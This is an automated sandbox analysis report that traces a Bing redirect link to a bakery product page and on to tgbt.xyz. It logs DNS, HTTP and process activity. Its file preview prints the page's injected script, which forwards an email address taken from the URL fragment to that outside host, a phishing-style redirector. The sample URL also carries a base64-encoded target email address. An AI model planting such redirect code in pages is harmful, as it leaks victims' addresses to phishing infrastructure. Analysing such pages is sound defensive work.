Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://www.bing.com/ck/a?!&&p=e0aa5e56e0123c0aJmltdHM9MTcxMzkxNjgwMCZpZ3VpZD0zMzUxYmMyZS03MTZhLTZmNjUtM2IyNC1hODRlNzA1MDZlMmYmaW5zaWQ9NTMxMQ&ptn=3&ver=2&hsh=3&fclid=3351bc2e-716a-6f65-3b24-a84e70506e2f&u=a1aHR0cHM6Ly9wbmRlbGl2ZXJ5LmNvbS9wcm9kdWN0L2dyYW5kbWFzLWJlcnJ5LW11ZmZpbnMv#Y3J5c3RhbC5zaGlAY24u

Overview

General Information

Sample URL:https://www.bing.com/ck/a?!&&p=e0aa5e56e0123c0aJmltdHM9MTcxMzkxNjgwMCZpZ3VpZD0zMzUxYmMyZS03MTZhLTZmNjUtM2IyNC1hODRlNzA1MDZlMmYmaW5zaWQ9NTMxMQ&ptn=3&ver=2&hsh=3&fclid=3351bc2e-716a-6f65-3b24-a84e70506e
Analysis ID:1433168
Infos:

Detection

Score:20
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Performs DNS queries to domains with low reputation

Classification

  • System is w10x64
  • chrome.exe (PID: 1308 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 4600 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1996,i,5827511548068904742,14250865823903610832,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6512 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=e0aa5e56e0123c0aJmltdHM9MTcxMzkxNjgwMCZpZ3VpZD0zMzUxYmMyZS03MTZhLTZmNjUtM2IyNC1hODRlNzA1MDZlMmYmaW5zaWQ9NTMxMQ&ptn=3&ver=2&hsh=3&fclid=3351bc2e-716a-6f65-3b24-a84e70506e2f&u=a1aHR0cHM6Ly9wbmRlbGl2ZXJ5LmNvbS9wcm9kdWN0L2dyYW5kbWFzLWJlcnJ5LW11ZmZpbnMv#Y3J5c3RhbC5zaGlAY24uYXRzLm5ldA==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 23.203.40.158:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.203.40.158:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49753 version: TLS 1.2

Networking

barindex
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: tgbt.xyz
Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: tgbt.xyz
Source: unknownTCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 23.203.40.158
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknownTCP traffic detected without corresponding DNS query: 72.21.81.240
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /product/grandmas-berry-muffins/ HTTP/1.1Host: pndelivery.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bf27fe88-dbfa-41ad-98d7-d1eb92d995bc/c9YMDpstwYbAHlgdSi HTTP/1.1Host: tgbt.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://pndelivery.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=b44B1+h++z7PEvC&MD=rkzuDEOH HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=b44B1+h++z7PEvC&MD=rkzuDEOH HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficDNS traffic detected: DNS query: pndelivery.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: tgbt.xyz
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: unknownHTTP traffic detected: POST /report/v4?s=xHsZbEt%2BEQb8tkMtTf3b9d495RCkfyp%2BI3J1I8%2FUdUBlcjCQBo0Egs3hZgK%2FWhHrXH%2F8kr5vH1M%2B3MLQXOGO1rpXTvv8DFLd0PgyI84Q5Y4LTjC08PkFpIul3Q%3D%3D HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 458Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: chromecache_41.2.drString found in binary or memory: https://tgbt.xyz/bf27fe88-dbfa-41ad-98d7-d1eb92d995bc/c9YMDpstwYbAHlgdSi#
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49672
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownHTTPS traffic detected: 23.203.40.158:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.203.40.158:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.4:49753 version: TLS 1.2
Source: classification engineClassification label: sus20.troj.win@19/2@9/6
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1996,i,5827511548068904742,14250865823903610832,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=e0aa5e56e0123c0aJmltdHM9MTcxMzkxNjgwMCZpZ3VpZD0zMzUxYmMyZS03MTZhLTZmNjUtM2IyNC1hODRlNzA1MDZlMmYmaW5zaWQ9NTMxMQ&ptn=3&ver=2&hsh=3&fclid=3351bc2e-716a-6f65-3b24-a84e70506e2f&u=a1aHR0cHM6Ly9wbmRlbGl2ZXJ5LmNvbS9wcm9kdWN0L2dyYW5kbWFzLWJlcnJ5LW11ZmZpbnMv#Y3J5c3RhbC5zaGlAY24uYXRzLm5ldA=="
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1996,i,5827511548068904742,14250865823903610832,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management InstrumentationPath Interception1
Process Injection
1
Process Injection
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.bing.com/ck/a?!&&p=e0aa5e56e0123c0aJmltdHM9MTcxMzkxNjgwMCZpZ3VpZD0zMzUxYmMyZS03MTZhLTZmNjUtM2IyNC1hODRlNzA1MDZlMmYmaW5zaWQ9NTMxMQ&ptn=3&ver=2&hsh=3&fclid=3351bc2e-716a-6f65-3b24-a84e70506e2f&u=a1aHR0cHM6Ly9wbmRlbGl2ZXJ5LmNvbS9wcm9kdWN0L2dyYW5kbWFzLWJlcnJ5LW11ZmZpbnMv#Y3J5c3RhbC5zaGlAY24uYXRzLm5ldA==0%Avira URL Cloudsafe
https://www.bing.com/ck/a?!&&p=e0aa5e56e0123c0aJmltdHM9MTcxMzkxNjgwMCZpZ3VpZD0zMzUxYmMyZS03MTZhLTZmNjUtM2IyNC1hODRlNzA1MDZlMmYmaW5zaWQ9NTMxMQ&ptn=3&ver=2&hsh=3&fclid=3351bc2e-716a-6f65-3b24-a84e70506e2f&u=a1aHR0cHM6Ly9wbmRlbGl2ZXJ5LmNvbS9wcm9kdWN0L2dyYW5kbWFzLWJlcnJ5LW11ZmZpbnMv#Y3J5c3RhbC5zaGlAY24uYXRzLm5ldA==0%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
pndelivery.com2%VirustotalBrowse
fp2e7a.wpc.phicdn.net0%VirustotalBrowse
tgbt.xyz0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://tgbt.xyz/bf27fe88-dbfa-41ad-98d7-d1eb92d995bc/c9YMDpstwYbAHlgdSi0%Avira URL Cloudsafe
https://pndelivery.com/product/grandmas-berry-muffins/0%Avira URL Cloudsafe
https://tgbt.xyz/bf27fe88-dbfa-41ad-98d7-d1eb92d995bc/c9YMDpstwYbAHlgdSi#0%Avira URL Cloudsafe
https://pndelivery.com/product/grandmas-berry-muffins/2%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
a.nel.cloudflare.com
35.190.80.1
truefalse
    high
    www.google.com
    172.217.2.36
    truefalse
      high
      pndelivery.com
      101.99.90.110
      truefalseunknown
      tgbt.xyz
      172.67.218.241
      truetrueunknown
      fp2e7a.wpc.phicdn.net
      192.229.211.108
      truefalseunknown
      NameMaliciousAntivirus DetectionReputation
      https://tgbt.xyz/bf27fe88-dbfa-41ad-98d7-d1eb92d995bc/c9YMDpstwYbAHlgdSifalse
      • Avira URL Cloud: safe
      unknown
      https://pndelivery.com/product/grandmas-berry-muffins/false
      • 2%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://a.nel.cloudflare.com/report/v4?s=xHsZbEt%2BEQb8tkMtTf3b9d495RCkfyp%2BI3J1I8%2FUdUBlcjCQBo0Egs3hZgK%2FWhHrXH%2F8kr5vH1M%2B3MLQXOGO1rpXTvv8DFLd0PgyI84Q5Y4LTjC08PkFpIul3Q%3D%3Dfalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://tgbt.xyz/bf27fe88-dbfa-41ad-98d7-d1eb92d995bc/c9YMDpstwYbAHlgdSi#chromecache_41.2.drfalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        101.99.90.110
        pndelivery.comMalaysia
        45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYfalse
        172.67.218.241
        tgbt.xyzUnited States
        13335CLOUDFLARENETUStrue
        239.255.255.250
        unknownReserved
        unknownunknownfalse
        172.217.2.36
        www.google.comUnited States
        15169GOOGLEUSfalse
        35.190.80.1
        a.nel.cloudflare.comUnited States
        15169GOOGLEUSfalse
        IP
        192.168.2.4
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1433168
        Start date and time:2024-04-29 10:28:55 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 3m 11s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:browseurl.jbs
        Sample URL:https://www.bing.com/ck/a?!&&p=e0aa5e56e0123c0aJmltdHM9MTcxMzkxNjgwMCZpZ3VpZD0zMzUxYmMyZS03MTZhLTZmNjUtM2IyNC1hODRlNzA1MDZlMmYmaW5zaWQ9NTMxMQ&ptn=3&ver=2&hsh=3&fclid=3351bc2e-716a-6f65-3b24-a84e70506e2f&u=a1aHR0cHM6Ly9wbmRlbGl2ZXJ5LmNvbS9wcm9kdWN0L2dyYW5kbWFzLWJlcnJ5LW11ZmZpbnMv#Y3J5c3RhbC5zaGlAY24uYXRzLm5ldA==
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:8
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Detection:SUS
        Classification:sus20.troj.win@19/2@9/6
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 172.217.4.195, 142.251.166.84, 172.217.4.46, 34.104.35.123, 204.79.197.200, 13.107.21.200, 23.52.42.62, 23.52.42.8, 23.52.42.56, 23.52.42.46, 23.52.42.48, 23.52.42.7, 23.52.42.63, 23.52.42.61, 23.52.42.49, 192.229.211.108, 20.166.126.56, 20.242.39.171, 142.250.191.227
        • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, dual-a-0001.a-msedge.net, clientservices.googleapis.com, ctldl.windowsupdate.com, a767.dspw65.akamai.net, wu-bg-shim.trafficmanager.net, download.windowsupdate.com.edgesuite.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, www-bing-com.dual-a-0001.a-msedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, update.googleapis.com, wwwprod.www-bing-com.akadns.net, clients.l.google.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size getting too big, too many NtSetInformationFile calls found.
        No simulations
        No context
        No context
        No context
        No context
        No context
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:HTML document, ASCII text, with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):524
        Entropy (8bit):5.416509633580713
        Encrypted:false
        SSDEEP:12:hnMEwuiuX4w4vy4Wh3uyduaoyAaexHqHBj4QYMb4qJm7+xH9L:hMNmMvy4Wp7iyAa7N4QYMT7L
        MD5:90D1DE6643E2F305771620D1AA2FAA9C
        SHA1:364D90C1FC439EFE48C2D61022C3DA0EAC8209D2
        SHA-256:C2BB4A39B58F1E3C13E08D395A892D99FB9808A917DA2770C15CFDA78C93D9A6
        SHA-512:90120F35D58A4A51926154ABB0B9E163CCDA3AF902BD83DD879D11F040CDE646033BEA589C985B51A30A0D5B44C040052EDF280E0A7529F2E539DE7652B3125A
        Malicious:false
        Reputation:low
        URL:https://pndelivery.com/product/grandmas-berry-muffins/
        Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head></head>..</body>..<script>.. var hash = window.location.hash;.. if(hash !== "") {.... hash = hash.split('#');.. const email = hash[1];.... window.location.href = "https://tgbt.xyz/bf27fe88-dbfa-41ad-98d7-d1eb92d995bc/c9YMDpstwYbAHlgdSi#" + email;.. }..</script>..</html><script type="text/javascript">window.location.href = ""</script>.
        No static file info
        TimestampSource PortDest PortSource IPDest IP
        Apr 29, 2024 10:29:38.492979050 CEST49678443192.168.2.4104.46.162.224
        Apr 29, 2024 10:29:39.664773941 CEST49675443192.168.2.4173.222.162.32
        Apr 29, 2024 10:29:49.274182081 CEST49675443192.168.2.4173.222.162.32
        Apr 29, 2024 10:29:55.394609928 CEST49739443192.168.2.4101.99.90.110
        Apr 29, 2024 10:29:55.394651890 CEST44349739101.99.90.110192.168.2.4
        Apr 29, 2024 10:29:55.394722939 CEST49739443192.168.2.4101.99.90.110
        Apr 29, 2024 10:29:55.395020008 CEST49739443192.168.2.4101.99.90.110
        Apr 29, 2024 10:29:55.395041943 CEST44349739101.99.90.110192.168.2.4
        Apr 29, 2024 10:29:55.509933949 CEST49740443192.168.2.4172.217.2.36
        Apr 29, 2024 10:29:55.509979963 CEST44349740172.217.2.36192.168.2.4
        Apr 29, 2024 10:29:55.510044098 CEST49740443192.168.2.4172.217.2.36
        Apr 29, 2024 10:29:55.510291100 CEST49740443192.168.2.4172.217.2.36
        Apr 29, 2024 10:29:55.510308027 CEST44349740172.217.2.36192.168.2.4
        Apr 29, 2024 10:29:55.756146908 CEST44349740172.217.2.36192.168.2.4
        Apr 29, 2024 10:29:55.784411907 CEST49740443192.168.2.4172.217.2.36
        Apr 29, 2024 10:29:55.784441948 CEST44349740172.217.2.36192.168.2.4
        Apr 29, 2024 10:29:55.788315058 CEST44349740172.217.2.36192.168.2.4
        Apr 29, 2024 10:29:55.788450956 CEST49740443192.168.2.4172.217.2.36
        Apr 29, 2024 10:29:55.795469999 CEST49740443192.168.2.4172.217.2.36
        Apr 29, 2024 10:29:55.795653105 CEST44349740172.217.2.36192.168.2.4
        Apr 29, 2024 10:29:55.944895029 CEST49740443192.168.2.4172.217.2.36
        Apr 29, 2024 10:29:55.944915056 CEST44349740172.217.2.36192.168.2.4
        Apr 29, 2024 10:29:56.140157938 CEST49740443192.168.2.4172.217.2.36
        Apr 29, 2024 10:29:56.196388006 CEST44349739101.99.90.110192.168.2.4
        Apr 29, 2024 10:29:56.249164104 CEST49739443192.168.2.4101.99.90.110
        Apr 29, 2024 10:29:57.170319080 CEST49739443192.168.2.4101.99.90.110
        Apr 29, 2024 10:29:57.170341015 CEST44349739101.99.90.110192.168.2.4
        Apr 29, 2024 10:29:57.171370983 CEST44349739101.99.90.110192.168.2.4
        Apr 29, 2024 10:29:57.171385050 CEST44349739101.99.90.110192.168.2.4
        Apr 29, 2024 10:29:57.171447039 CEST49739443192.168.2.4101.99.90.110
        Apr 29, 2024 10:30:00.320034981 CEST49739443192.168.2.4101.99.90.110
        Apr 29, 2024 10:30:00.320461035 CEST44349739101.99.90.110192.168.2.4
        Apr 29, 2024 10:30:00.332118988 CEST49739443192.168.2.4101.99.90.110
        Apr 29, 2024 10:30:00.332137108 CEST44349739101.99.90.110192.168.2.4
        Apr 29, 2024 10:30:00.538136005 CEST49739443192.168.2.4101.99.90.110
        Apr 29, 2024 10:30:01.029979944 CEST49741443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:01.030011892 CEST4434974123.203.40.158192.168.2.4
        Apr 29, 2024 10:30:01.030111074 CEST49741443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:01.032828093 CEST49741443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:01.032845974 CEST4434974123.203.40.158192.168.2.4
        Apr 29, 2024 10:30:01.167076111 CEST44349739101.99.90.110192.168.2.4
        Apr 29, 2024 10:30:01.172194958 CEST44349739101.99.90.110192.168.2.4
        Apr 29, 2024 10:30:01.172264099 CEST49739443192.168.2.4101.99.90.110
        Apr 29, 2024 10:30:01.174196959 CEST49739443192.168.2.4101.99.90.110
        Apr 29, 2024 10:30:01.174220085 CEST44349739101.99.90.110192.168.2.4
        Apr 29, 2024 10:30:01.261696100 CEST4434974123.203.40.158192.168.2.4
        Apr 29, 2024 10:30:01.261790037 CEST49741443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:01.264612913 CEST49741443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:01.264621973 CEST4434974123.203.40.158192.168.2.4
        Apr 29, 2024 10:30:01.265050888 CEST4434974123.203.40.158192.168.2.4
        Apr 29, 2024 10:30:01.335391998 CEST49741443192.168.2.423.203.40.158
        Apr 29, 2024 10:30:01.380125999 CEST4434974123.203.40.158192.168.2.4
        Apr 29, 2024 10:30:01.475991964 CEST4434974123.203.40.158192.168.2.4
